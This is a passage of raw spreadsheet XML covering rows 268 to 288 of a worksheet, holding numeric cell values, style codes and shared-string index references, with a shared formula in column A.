      <c r="R268" s="8"/>
      <c r="S268" s="6">
        <v>3565132.0</v>
      </c>
      <c r="T268" s="8"/>
      <c r="U268" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V268" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W268" s="2" t="s">
        <v>890</v>
      </c>
      <c r="X268" s="6">
        <v>1.0</v>
      </c>
      <c r="Y268" s="6">
        <v>0.0</v>
      </c>
      <c r="Z268" s="8"/>
      <c r="AA268" s="8"/>
      <c r="AB268" s="8"/>
      <c r="AC268" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE268" s="8"/>
      <c r="AF268" s="14"/>
    </row>
    <row r="269">
      <c r="A269" s="6">
        <f t="shared" si="1"/>
        <v>0.2994204821</v>
      </c>
      <c r="B269" s="6">
        <v>5.7187099E7</v>
      </c>
      <c r="C269" s="6">
        <v>1.0</v>
      </c>
      <c r="D269" s="7"/>
      <c r="E269" s="8"/>
      <c r="F269" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G269" s="8"/>
      <c r="H269" s="6">
        <v>0.0</v>
      </c>
      <c r="I269" s="6">
        <v>120.0</v>
      </c>
      <c r="J269" s="17"/>
      <c r="K269" s="17"/>
      <c r="L269" s="17"/>
      <c r="M269" s="17"/>
      <c r="N269" s="17"/>
      <c r="O269" s="4" t="s">
        <v>891</v>
      </c>
      <c r="P269" s="4" t="s">
        <v>892</v>
      </c>
      <c r="Q269" s="6">
        <v>1069833.0</v>
      </c>
      <c r="R269" s="7"/>
      <c r="S269" s="7"/>
      <c r="T269" s="7"/>
      <c r="U269" s="8"/>
      <c r="V269" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W269" s="2" t="s">
        <v>893</v>
      </c>
      <c r="X269" s="6">
        <v>1.0</v>
      </c>
      <c r="Y269" s="6">
        <v>0.0</v>
      </c>
      <c r="Z269" s="7"/>
      <c r="AA269" s="7"/>
      <c r="AB269" s="7"/>
      <c r="AC269" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE269" s="8"/>
      <c r="AF269" s="15"/>
    </row>
    <row r="270">
      <c r="A270" s="6">
        <f t="shared" si="1"/>
        <v>0.5993999426</v>
      </c>
      <c r="B270" s="6">
        <v>9101696.0</v>
      </c>
      <c r="C270" s="6">
        <v>1.0</v>
      </c>
      <c r="D270" s="8"/>
      <c r="E270" s="8"/>
      <c r="F270" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G270" s="8"/>
      <c r="H270" s="6">
        <v>1.0</v>
      </c>
      <c r="I270" s="6">
        <v>2199.0</v>
      </c>
      <c r="J270" s="20"/>
      <c r="K270" s="20"/>
      <c r="L270" s="20"/>
      <c r="M270" s="20"/>
      <c r="N270" s="20"/>
      <c r="O270" s="4" t="s">
        <v>894</v>
      </c>
      <c r="P270" s="4" t="s">
        <v>895</v>
      </c>
      <c r="Q270" s="6">
        <v>477312.0</v>
      </c>
      <c r="R270" s="8"/>
      <c r="S270" s="6">
        <v>477312.0</v>
      </c>
      <c r="T270" s="8"/>
      <c r="U270" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V270" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W270" s="2" t="s">
        <v>896</v>
      </c>
      <c r="X270" s="6">
        <v>1.0</v>
      </c>
      <c r="Y270" s="6">
        <v>0.0</v>
      </c>
      <c r="Z270" s="8"/>
      <c r="AA270" s="8"/>
      <c r="AB270" s="8"/>
      <c r="AC270" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE270" s="8"/>
      <c r="AF270" s="14"/>
    </row>
    <row r="271">
      <c r="A271" s="6">
        <f t="shared" si="1"/>
        <v>0.6722860673</v>
      </c>
      <c r="B271" s="6">
        <v>3.8710326E7</v>
      </c>
      <c r="C271" s="6">
        <v>1.0</v>
      </c>
      <c r="D271" s="6">
        <v>3.8721806E7</v>
      </c>
      <c r="E271" s="8"/>
      <c r="F271" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G271" s="8"/>
      <c r="H271" s="6">
        <v>2.0</v>
      </c>
      <c r="I271" s="6">
        <v>2080.0</v>
      </c>
      <c r="J271" s="17"/>
      <c r="K271" s="17"/>
      <c r="L271" s="17"/>
      <c r="M271" s="17"/>
      <c r="N271" s="17"/>
      <c r="O271" s="4" t="s">
        <v>897</v>
      </c>
      <c r="P271" s="4" t="s">
        <v>898</v>
      </c>
      <c r="Q271" s="6">
        <v>3564816.0</v>
      </c>
      <c r="R271" s="7"/>
      <c r="S271" s="7"/>
      <c r="T271" s="7"/>
      <c r="U271" s="8"/>
      <c r="V271" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W271" s="2" t="s">
        <v>899</v>
      </c>
      <c r="X271" s="6">
        <v>2.0</v>
      </c>
      <c r="Y271" s="6">
        <v>0.0</v>
      </c>
      <c r="Z271" s="6">
        <v>0.0</v>
      </c>
      <c r="AA271" s="7"/>
      <c r="AB271" s="7"/>
      <c r="AC271" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE271" s="8"/>
      <c r="AF271" s="15"/>
    </row>
    <row r="272">
      <c r="A272" s="6">
        <f t="shared" si="1"/>
        <v>0.3795905775</v>
      </c>
      <c r="B272" s="6">
        <v>3.8424089E7</v>
      </c>
      <c r="C272" s="6">
        <v>1.0</v>
      </c>
      <c r="D272" s="8"/>
      <c r="E272" s="8"/>
      <c r="F272" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G272" s="8"/>
      <c r="H272" s="6">
        <v>-1.0</v>
      </c>
      <c r="I272" s="6">
        <v>81.0</v>
      </c>
      <c r="J272" s="20"/>
      <c r="K272" s="20"/>
      <c r="L272" s="20"/>
      <c r="M272" s="20"/>
      <c r="N272" s="20"/>
      <c r="O272" s="4" t="s">
        <v>900</v>
      </c>
      <c r="P272" s="4" t="s">
        <v>901</v>
      </c>
      <c r="Q272" s="6">
        <v>5117484.0</v>
      </c>
      <c r="R272" s="8"/>
      <c r="S272" s="8"/>
      <c r="T272" s="8"/>
      <c r="U272" s="8"/>
      <c r="V272" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W272" s="2" t="s">
        <v>902</v>
      </c>
      <c r="X272" s="6">
        <v>1.0</v>
      </c>
      <c r="Y272" s="6">
        <v>0.0</v>
      </c>
      <c r="Z272" s="8"/>
      <c r="AA272" s="8"/>
      <c r="AB272" s="8"/>
      <c r="AC272" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE272" s="8"/>
      <c r="AF272" s="14"/>
    </row>
    <row r="273">
      <c r="A273" s="6">
        <f t="shared" si="1"/>
        <v>0.8801006233</v>
      </c>
      <c r="B273" s="6">
        <v>2.9642465E7</v>
      </c>
      <c r="C273" s="6">
        <v>1.0</v>
      </c>
      <c r="D273" s="8"/>
      <c r="E273" s="8"/>
      <c r="F273" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G273" s="8"/>
      <c r="H273" s="6">
        <v>1.0</v>
      </c>
      <c r="I273" s="6">
        <v>253.0</v>
      </c>
      <c r="J273" s="20"/>
      <c r="K273" s="20"/>
      <c r="L273" s="20"/>
      <c r="M273" s="20"/>
      <c r="N273" s="20"/>
      <c r="O273" s="4" t="s">
        <v>903</v>
      </c>
      <c r="P273" s="4" t="s">
        <v>904</v>
      </c>
      <c r="Q273" s="6">
        <v>1298089.0</v>
      </c>
      <c r="R273" s="8"/>
      <c r="S273" s="8"/>
      <c r="T273" s="8"/>
      <c r="U273" s="8"/>
      <c r="V273" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W273" s="2" t="s">
        <v>905</v>
      </c>
      <c r="X273" s="6">
        <v>2.0</v>
      </c>
      <c r="Y273" s="6">
        <v>0.0</v>
      </c>
      <c r="Z273" s="8"/>
      <c r="AA273" s="8"/>
      <c r="AB273" s="8"/>
      <c r="AC273" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE273" s="8"/>
      <c r="AF273" s="14"/>
    </row>
    <row r="274">
      <c r="A274" s="6">
        <f t="shared" si="1"/>
        <v>0.2166403833</v>
      </c>
      <c r="B274" s="6">
        <v>1.6412442E7</v>
      </c>
      <c r="C274" s="6">
        <v>1.0</v>
      </c>
      <c r="D274" s="7"/>
      <c r="E274" s="8"/>
      <c r="F274" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G274" s="8"/>
      <c r="H274" s="6">
        <v>0.0</v>
      </c>
      <c r="I274" s="6">
        <v>2046.0</v>
      </c>
      <c r="J274" s="17"/>
      <c r="K274" s="17"/>
      <c r="L274" s="17"/>
      <c r="M274" s="17"/>
      <c r="N274" s="17"/>
      <c r="O274" s="4" t="s">
        <v>906</v>
      </c>
      <c r="P274" s="4" t="s">
        <v>907</v>
      </c>
      <c r="Q274" s="6">
        <v>2355861.0</v>
      </c>
      <c r="R274" s="7"/>
      <c r="S274" s="7"/>
      <c r="T274" s="7"/>
      <c r="U274" s="8"/>
      <c r="V274" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W274" s="2" t="s">
        <v>908</v>
      </c>
      <c r="X274" s="6">
        <v>2.0</v>
      </c>
      <c r="Y274" s="6">
        <v>0.0</v>
      </c>
      <c r="Z274" s="7"/>
      <c r="AA274" s="7"/>
      <c r="AB274" s="7"/>
      <c r="AC274" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE274" s="8"/>
      <c r="AF274" s="15"/>
    </row>
    <row r="275">
      <c r="A275" s="6">
        <f t="shared" si="1"/>
        <v>0.5913442631</v>
      </c>
      <c r="B275" s="6">
        <v>1.9884074E7</v>
      </c>
      <c r="C275" s="6">
        <v>1.0</v>
      </c>
      <c r="D275" s="8"/>
      <c r="E275" s="8"/>
      <c r="F275" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G275" s="8"/>
      <c r="H275" s="6">
        <v>1.0</v>
      </c>
      <c r="I275" s="6">
        <v>167.0</v>
      </c>
      <c r="J275" s="17"/>
      <c r="K275" s="17"/>
      <c r="L275" s="17"/>
      <c r="M275" s="17"/>
      <c r="N275" s="17"/>
      <c r="O275" s="4" t="s">
        <v>909</v>
      </c>
      <c r="P275" s="4" t="s">
        <v>910</v>
      </c>
      <c r="Q275" s="6">
        <v>1720371.0</v>
      </c>
      <c r="R275" s="7"/>
      <c r="S275" s="7"/>
      <c r="T275" s="7"/>
      <c r="U275" s="8"/>
      <c r="V275" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W275" s="2" t="s">
        <v>911</v>
      </c>
      <c r="X275" s="6">
        <v>3.0</v>
      </c>
      <c r="Y275" s="6">
        <v>4.0</v>
      </c>
      <c r="Z275" s="7"/>
      <c r="AA275" s="7"/>
      <c r="AB275" s="7"/>
      <c r="AC275" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE275" s="8"/>
      <c r="AF275" s="15"/>
    </row>
    <row r="276">
      <c r="A276" s="6">
        <f t="shared" si="1"/>
        <v>0.6510151224</v>
      </c>
      <c r="B276" s="6">
        <v>4.9507493E7</v>
      </c>
      <c r="C276" s="6">
        <v>1.0</v>
      </c>
      <c r="D276" s="8"/>
      <c r="E276" s="8"/>
      <c r="F276" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G276" s="8"/>
      <c r="H276" s="6">
        <v>0.0</v>
      </c>
      <c r="I276" s="6">
        <v>68.0</v>
      </c>
      <c r="J276" s="20"/>
      <c r="K276" s="20"/>
      <c r="L276" s="20"/>
      <c r="M276" s="20"/>
      <c r="N276" s="20"/>
      <c r="O276" s="4" t="s">
        <v>912</v>
      </c>
      <c r="P276" s="4" t="s">
        <v>913</v>
      </c>
      <c r="Q276" s="6">
        <v>566817.0</v>
      </c>
      <c r="R276" s="8"/>
      <c r="S276" s="8"/>
      <c r="T276" s="8"/>
      <c r="U276" s="8"/>
      <c r="V276" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W276" s="2" t="s">
        <v>914</v>
      </c>
      <c r="X276" s="6">
        <v>1.0</v>
      </c>
      <c r="Y276" s="6">
        <v>3.0</v>
      </c>
      <c r="Z276" s="8"/>
      <c r="AA276" s="8"/>
      <c r="AB276" s="8"/>
      <c r="AC276" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE276" s="8"/>
      <c r="AF276" s="14"/>
    </row>
    <row r="277">
      <c r="A277" s="6">
        <f t="shared" si="1"/>
        <v>0.6775479523</v>
      </c>
      <c r="B277" s="6">
        <v>4.4731921E7</v>
      </c>
      <c r="C277" s="6">
        <v>1.0</v>
      </c>
      <c r="D277" s="6">
        <v>4.473207E7</v>
      </c>
      <c r="E277" s="8"/>
      <c r="F277" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G277" s="8"/>
      <c r="H277" s="6">
        <v>0.0</v>
      </c>
      <c r="I277" s="6">
        <v>128.0</v>
      </c>
      <c r="J277" s="20"/>
      <c r="K277" s="20"/>
      <c r="L277" s="20"/>
      <c r="M277" s="20"/>
      <c r="N277" s="20"/>
      <c r="O277" s="4" t="s">
        <v>915</v>
      </c>
      <c r="P277" s="4" t="s">
        <v>916</v>
      </c>
      <c r="Q277" s="6">
        <v>277368.0</v>
      </c>
      <c r="R277" s="8"/>
      <c r="S277" s="8"/>
      <c r="T277" s="8"/>
      <c r="U277" s="8"/>
      <c r="V277" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W277" s="2" t="s">
        <v>917</v>
      </c>
      <c r="X277" s="6">
        <v>1.0</v>
      </c>
      <c r="Y277" s="6">
        <v>0.0</v>
      </c>
      <c r="Z277" s="8"/>
      <c r="AA277" s="8"/>
      <c r="AB277" s="8"/>
      <c r="AC277" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE277" s="8"/>
      <c r="AF277" s="14"/>
    </row>
    <row r="278">
      <c r="A278" s="6">
        <f t="shared" si="1"/>
        <v>0.5526231816</v>
      </c>
      <c r="B278" s="6">
        <v>1.0378814E7</v>
      </c>
      <c r="C278" s="6">
        <v>1.0</v>
      </c>
      <c r="D278" s="8"/>
      <c r="E278" s="8"/>
      <c r="F278" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G278" s="8"/>
      <c r="H278" s="6">
        <v>3.0</v>
      </c>
      <c r="I278" s="6">
        <v>2018.0</v>
      </c>
      <c r="J278" s="20"/>
      <c r="K278" s="20"/>
      <c r="L278" s="20"/>
      <c r="M278" s="20"/>
      <c r="N278" s="20"/>
      <c r="O278" s="4" t="s">
        <v>918</v>
      </c>
      <c r="P278" s="4" t="s">
        <v>919</v>
      </c>
      <c r="Q278" s="6">
        <v>182305.0</v>
      </c>
      <c r="R278" s="8"/>
      <c r="S278" s="6">
        <v>107625.0</v>
      </c>
      <c r="T278" s="8"/>
      <c r="U278" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V278" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W278" s="2" t="s">
        <v>920</v>
      </c>
      <c r="X278" s="6">
        <v>2.0</v>
      </c>
      <c r="Y278" s="6">
        <v>0.0</v>
      </c>
      <c r="Z278" s="6">
        <v>0.0</v>
      </c>
      <c r="AA278" s="8"/>
      <c r="AB278" s="8"/>
      <c r="AC278" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE278" s="8"/>
      <c r="AF278" s="14"/>
    </row>
    <row r="279">
      <c r="A279" s="6">
        <f t="shared" si="1"/>
        <v>0.2662301222</v>
      </c>
      <c r="B279" s="6">
        <v>6.9598882E7</v>
      </c>
      <c r="C279" s="6">
        <v>1.0</v>
      </c>
      <c r="D279" s="8"/>
      <c r="E279" s="8"/>
      <c r="F279" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G279" s="8"/>
      <c r="H279" s="6">
        <v>1.0</v>
      </c>
      <c r="I279" s="6">
        <v>737.0</v>
      </c>
      <c r="J279" s="20"/>
      <c r="K279" s="20"/>
      <c r="L279" s="20"/>
      <c r="M279" s="20"/>
      <c r="N279" s="20"/>
      <c r="O279" s="4" t="s">
        <v>921</v>
      </c>
      <c r="P279" s="4" t="s">
        <v>922</v>
      </c>
      <c r="Q279" s="6">
        <v>1.6168897E7</v>
      </c>
      <c r="R279" s="8"/>
      <c r="S279" s="8"/>
      <c r="T279" s="8"/>
      <c r="U279" s="8"/>
      <c r="V279" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W279" s="2" t="s">
        <v>923</v>
      </c>
      <c r="X279" s="6">
        <v>1.0</v>
      </c>
      <c r="Y279" s="6">
        <v>0.0</v>
      </c>
      <c r="Z279" s="8"/>
      <c r="AA279" s="8"/>
      <c r="AB279" s="8"/>
      <c r="AC279" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE279" s="8"/>
      <c r="AF279" s="14"/>
    </row>
    <row r="280">
      <c r="A280" s="6">
        <f t="shared" si="1"/>
        <v>0.5303017307</v>
      </c>
      <c r="B280" s="6">
        <v>7.3686647E7</v>
      </c>
      <c r="C280" s="6">
        <v>1.0</v>
      </c>
      <c r="D280" s="8"/>
      <c r="E280" s="8"/>
      <c r="F280" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G280" s="8"/>
      <c r="H280" s="6">
        <v>0.0</v>
      </c>
      <c r="I280" s="6">
        <v>51.0</v>
      </c>
      <c r="J280" s="20"/>
      <c r="K280" s="20"/>
      <c r="L280" s="20"/>
      <c r="M280" s="20"/>
      <c r="N280" s="20"/>
      <c r="O280" s="4" t="s">
        <v>924</v>
      </c>
      <c r="P280" s="4" t="s">
        <v>925</v>
      </c>
      <c r="Q280" s="6">
        <v>4931530.0</v>
      </c>
      <c r="R280" s="8"/>
      <c r="S280" s="8"/>
      <c r="T280" s="8"/>
      <c r="U280" s="8"/>
      <c r="V280" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W280" s="2" t="s">
        <v>926</v>
      </c>
      <c r="X280" s="6">
        <v>0.0</v>
      </c>
      <c r="Y280" s="6">
        <v>0.0</v>
      </c>
      <c r="Z280" s="8"/>
      <c r="AA280" s="8"/>
      <c r="AB280" s="8"/>
      <c r="AC280" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE280" s="8"/>
      <c r="AF280" s="14"/>
    </row>
    <row r="281">
      <c r="A281" s="6">
        <f t="shared" si="1"/>
        <v>0.08991366871</v>
      </c>
      <c r="B281" s="6">
        <v>4.1587911E7</v>
      </c>
      <c r="C281" s="6">
        <v>1.0</v>
      </c>
      <c r="D281" s="8"/>
      <c r="E281" s="8"/>
      <c r="F281" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G281" s="8"/>
      <c r="H281" s="6">
        <v>0.0</v>
      </c>
      <c r="I281" s="6">
        <v>307.0</v>
      </c>
      <c r="J281" s="20"/>
      <c r="K281" s="20"/>
      <c r="L281" s="20"/>
      <c r="M281" s="20"/>
      <c r="N281" s="20"/>
      <c r="O281" s="4" t="s">
        <v>927</v>
      </c>
      <c r="P281" s="4" t="s">
        <v>928</v>
      </c>
      <c r="Q281" s="6">
        <v>7403352.0</v>
      </c>
      <c r="R281" s="8"/>
      <c r="S281" s="6">
        <v>-1.0</v>
      </c>
      <c r="T281" s="8"/>
      <c r="U281" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V281" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W281" s="2" t="s">
        <v>929</v>
      </c>
      <c r="X281" s="6">
        <v>1.0</v>
      </c>
      <c r="Y281" s="6">
        <v>2.0</v>
      </c>
      <c r="Z281" s="8"/>
      <c r="AA281" s="8"/>
      <c r="AB281" s="8"/>
      <c r="AC281" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE281" s="8"/>
      <c r="AF281" s="14"/>
    </row>
    <row r="282">
      <c r="A282" s="6">
        <f t="shared" si="1"/>
        <v>0.2401808223</v>
      </c>
      <c r="B282" s="6">
        <v>2.2290874E7</v>
      </c>
      <c r="C282" s="6">
        <v>1.0</v>
      </c>
      <c r="D282" s="6">
        <v>2.2334573E7</v>
      </c>
      <c r="E282" s="8"/>
      <c r="F282" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G282" s="8"/>
      <c r="H282" s="6">
        <v>3.0</v>
      </c>
      <c r="I282" s="6">
        <v>453.0</v>
      </c>
      <c r="J282" s="17"/>
      <c r="K282" s="17"/>
      <c r="L282" s="17"/>
      <c r="M282" s="17"/>
      <c r="N282" s="17"/>
      <c r="O282" s="4" t="s">
        <v>930</v>
      </c>
      <c r="P282" s="4" t="s">
        <v>931</v>
      </c>
      <c r="Q282" s="6">
        <v>49202.0</v>
      </c>
      <c r="R282" s="7"/>
      <c r="S282" s="6">
        <v>49202.0</v>
      </c>
      <c r="T282" s="7"/>
      <c r="U282" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V282" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W282" s="2" t="s">
        <v>932</v>
      </c>
      <c r="X282" s="6">
        <v>1.0</v>
      </c>
      <c r="Y282" s="6">
        <v>10.0</v>
      </c>
      <c r="Z282" s="7"/>
      <c r="AA282" s="7"/>
      <c r="AB282" s="7"/>
      <c r="AC282" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE282" s="8"/>
      <c r="AF282" s="15"/>
    </row>
    <row r="283">
      <c r="A283" s="6">
        <f t="shared" si="1"/>
        <v>0.9384273348</v>
      </c>
      <c r="B283" s="6">
        <v>2.20007E7</v>
      </c>
      <c r="C283" s="6">
        <v>1.0</v>
      </c>
      <c r="D283" s="6">
        <v>2.2009326E7</v>
      </c>
      <c r="E283" s="8"/>
      <c r="F283" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G283" s="8"/>
      <c r="H283" s="6">
        <v>1.0</v>
      </c>
      <c r="I283" s="6">
        <v>1707.0</v>
      </c>
      <c r="J283" s="17"/>
      <c r="K283" s="17"/>
      <c r="L283" s="17"/>
      <c r="M283" s="17"/>
      <c r="N283" s="17"/>
      <c r="O283" s="4" t="s">
        <v>933</v>
      </c>
      <c r="P283" s="4" t="s">
        <v>934</v>
      </c>
      <c r="Q283" s="6">
        <v>837623.0</v>
      </c>
      <c r="R283" s="7"/>
      <c r="S283" s="6">
        <v>837623.0</v>
      </c>
      <c r="T283" s="7"/>
      <c r="U283" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V283" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W283" s="2" t="s">
        <v>935</v>
      </c>
      <c r="X283" s="6">
        <v>2.0</v>
      </c>
      <c r="Y283" s="6">
        <v>4.0</v>
      </c>
      <c r="Z283" s="6">
        <v>0.0</v>
      </c>
      <c r="AA283" s="7"/>
      <c r="AB283" s="7"/>
      <c r="AC283" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE283" s="8"/>
      <c r="AF283" s="15"/>
    </row>
    <row r="284">
      <c r="A284" s="6">
        <f t="shared" si="1"/>
        <v>0.2903361223</v>
      </c>
      <c r="B284" s="6">
        <v>2703738.0</v>
      </c>
      <c r="C284" s="6">
        <v>1.0</v>
      </c>
      <c r="D284" s="6">
        <v>2703811.0</v>
      </c>
      <c r="E284" s="8"/>
      <c r="F284" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G284" s="8"/>
      <c r="H284" s="6">
        <v>4.0</v>
      </c>
      <c r="I284" s="6">
        <v>1251.0</v>
      </c>
      <c r="J284" s="17"/>
      <c r="K284" s="17"/>
      <c r="L284" s="17"/>
      <c r="M284" s="17"/>
      <c r="N284" s="17"/>
      <c r="O284" s="4" t="s">
        <v>936</v>
      </c>
      <c r="P284" s="4" t="s">
        <v>937</v>
      </c>
      <c r="Q284" s="6">
        <v>198402.0</v>
      </c>
      <c r="R284" s="7"/>
      <c r="S284" s="7"/>
      <c r="T284" s="7"/>
      <c r="U284" s="8"/>
      <c r="V284" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W284" s="2" t="s">
        <v>938</v>
      </c>
      <c r="X284" s="6">
        <v>2.0</v>
      </c>
      <c r="Y284" s="6">
        <v>0.0</v>
      </c>
      <c r="Z284" s="6">
        <v>0.0</v>
      </c>
      <c r="AA284" s="7"/>
      <c r="AB284" s="7"/>
      <c r="AC284" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE284" s="8"/>
      <c r="AF284" s="15"/>
    </row>
    <row r="285">
      <c r="A285" s="6">
        <f t="shared" si="1"/>
        <v>0.3143317995</v>
      </c>
      <c r="B285" s="6">
        <v>7.5153781E7</v>
      </c>
      <c r="C285" s="6">
        <v>1.0</v>
      </c>
      <c r="D285" s="6">
        <v>7.5153818E7</v>
      </c>
      <c r="E285" s="8"/>
      <c r="F285" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G285" s="8"/>
      <c r="H285" s="6">
        <v>0.0</v>
      </c>
      <c r="I285" s="6">
        <v>51.0</v>
      </c>
      <c r="J285" s="20"/>
      <c r="K285" s="20"/>
      <c r="L285" s="20"/>
      <c r="M285" s="20"/>
      <c r="N285" s="20"/>
      <c r="O285" s="4" t="s">
        <v>939</v>
      </c>
      <c r="P285" s="4" t="s">
        <v>940</v>
      </c>
      <c r="Q285" s="6">
        <v>1.3588465E7</v>
      </c>
      <c r="R285" s="8"/>
      <c r="S285" s="6">
        <v>1.3588465E7</v>
      </c>
      <c r="T285" s="8"/>
      <c r="U285" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V285" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W285" s="2" t="s">
        <v>941</v>
      </c>
      <c r="X285" s="6">
        <v>1.0</v>
      </c>
      <c r="Y285" s="6">
        <v>0.0</v>
      </c>
      <c r="Z285" s="8"/>
      <c r="AA285" s="8"/>
      <c r="AB285" s="8"/>
      <c r="AC285" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE285" s="8"/>
      <c r="AF285" s="14"/>
    </row>
    <row r="286">
      <c r="A286" s="6">
        <f t="shared" si="1"/>
        <v>0.3164031967</v>
      </c>
      <c r="B286" s="6">
        <v>6243871.0</v>
      </c>
      <c r="C286" s="6">
        <v>1.0</v>
      </c>
      <c r="D286" s="6">
        <v>9184649.0</v>
      </c>
      <c r="E286" s="8"/>
      <c r="F286" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G286" s="8"/>
      <c r="H286" s="6">
        <v>1.0</v>
      </c>
      <c r="I286" s="6">
        <v>5956.0</v>
      </c>
      <c r="J286" s="20"/>
      <c r="K286" s="20"/>
      <c r="L286" s="20"/>
      <c r="M286" s="20"/>
      <c r="N286" s="20"/>
      <c r="O286" s="4" t="s">
        <v>942</v>
      </c>
      <c r="P286" s="4" t="s">
        <v>943</v>
      </c>
      <c r="Q286" s="6">
        <v>784825.0</v>
      </c>
      <c r="R286" s="8"/>
      <c r="S286" s="6">
        <v>784825.0</v>
      </c>
      <c r="T286" s="8"/>
      <c r="U286" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V286" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W286" s="2" t="s">
        <v>944</v>
      </c>
      <c r="X286" s="6">
        <v>1.0</v>
      </c>
      <c r="Y286" s="6">
        <v>1.0</v>
      </c>
      <c r="Z286" s="6">
        <v>0.0</v>
      </c>
      <c r="AA286" s="8"/>
      <c r="AB286" s="8"/>
      <c r="AC286" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE286" s="8"/>
      <c r="AF286" s="14"/>
    </row>
    <row r="287">
      <c r="A287" s="6">
        <f t="shared" si="1"/>
        <v>0.2948484395</v>
      </c>
      <c r="B287" s="6">
        <v>6.3117981E7</v>
      </c>
      <c r="C287" s="6">
        <v>1.0</v>
      </c>
      <c r="D287" s="8"/>
      <c r="E287" s="8"/>
      <c r="F287" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G287" s="8"/>
      <c r="H287" s="6">
        <v>0.0</v>
      </c>
      <c r="I287" s="6">
        <v>569.0</v>
      </c>
      <c r="J287" s="20"/>
      <c r="K287" s="20"/>
      <c r="L287" s="20"/>
      <c r="M287" s="20"/>
      <c r="N287" s="20"/>
      <c r="O287" s="4" t="s">
        <v>945</v>
      </c>
      <c r="P287" s="4" t="s">
        <v>946</v>
      </c>
      <c r="Q287" s="6">
        <v>1.3023846E7</v>
      </c>
      <c r="R287" s="8"/>
      <c r="S287" s="6">
        <v>1.3023846E7</v>
      </c>
      <c r="T287" s="8"/>
      <c r="U287" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V287" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W287" s="2" t="s">
        <v>281</v>
      </c>
      <c r="X287" s="6">
        <v>0.0</v>
      </c>
      <c r="Y287" s="6">
        <v>4.0</v>
      </c>
      <c r="Z287" s="6">
        <v>0.0</v>
      </c>
      <c r="AA287" s="8"/>
      <c r="AB287" s="8"/>
      <c r="AC287" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE287" s="8"/>
      <c r="AF287" s="14"/>
    </row>
    <row r="288">
      <c r="A288" s="6">
        <f t="shared" si="1"/>
        <v>0.7309310346</v>
      </c>
      <c r="B288" s="6">
        <v>5.0565289E7</v>
      </c>
      <c r="C288" s="6">
        <v>1.0</v>
      </c>
      <c r="D288" s="8"/>
      <c r="E288" s="8"/>
      <c r="F288" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G288" s="8"/>
      <c r="H288" s="6">
        <v>0.0</v>
      </c>
      <c r="I288" s="6">
        <v>315.0</v>
      </c>
      <c r="J288" s="17"/>
      <c r="K288" s="17"/>
      <c r="L288" s="17"/>
      <c r="M288" s="17"/>
      <c r="N288" s="17"/>
      <c r="O288" s="4" t="s">
        <v>947</v>
      </c>
      <c r="P288" s="4" t="s">
        <v>948</v>
      </c>
      <c r="Q288" s="6">
        <v>7164143.0</v>
      </c>
      <c r="R288" s="7"/>
      <c r="S288" s="6">
        <v>5628642.0</v>
      </c>
      <c r="T288" s="7"/>
      <c r="U288" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V288" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W288" s="2" t="s">
        <v>949</v>
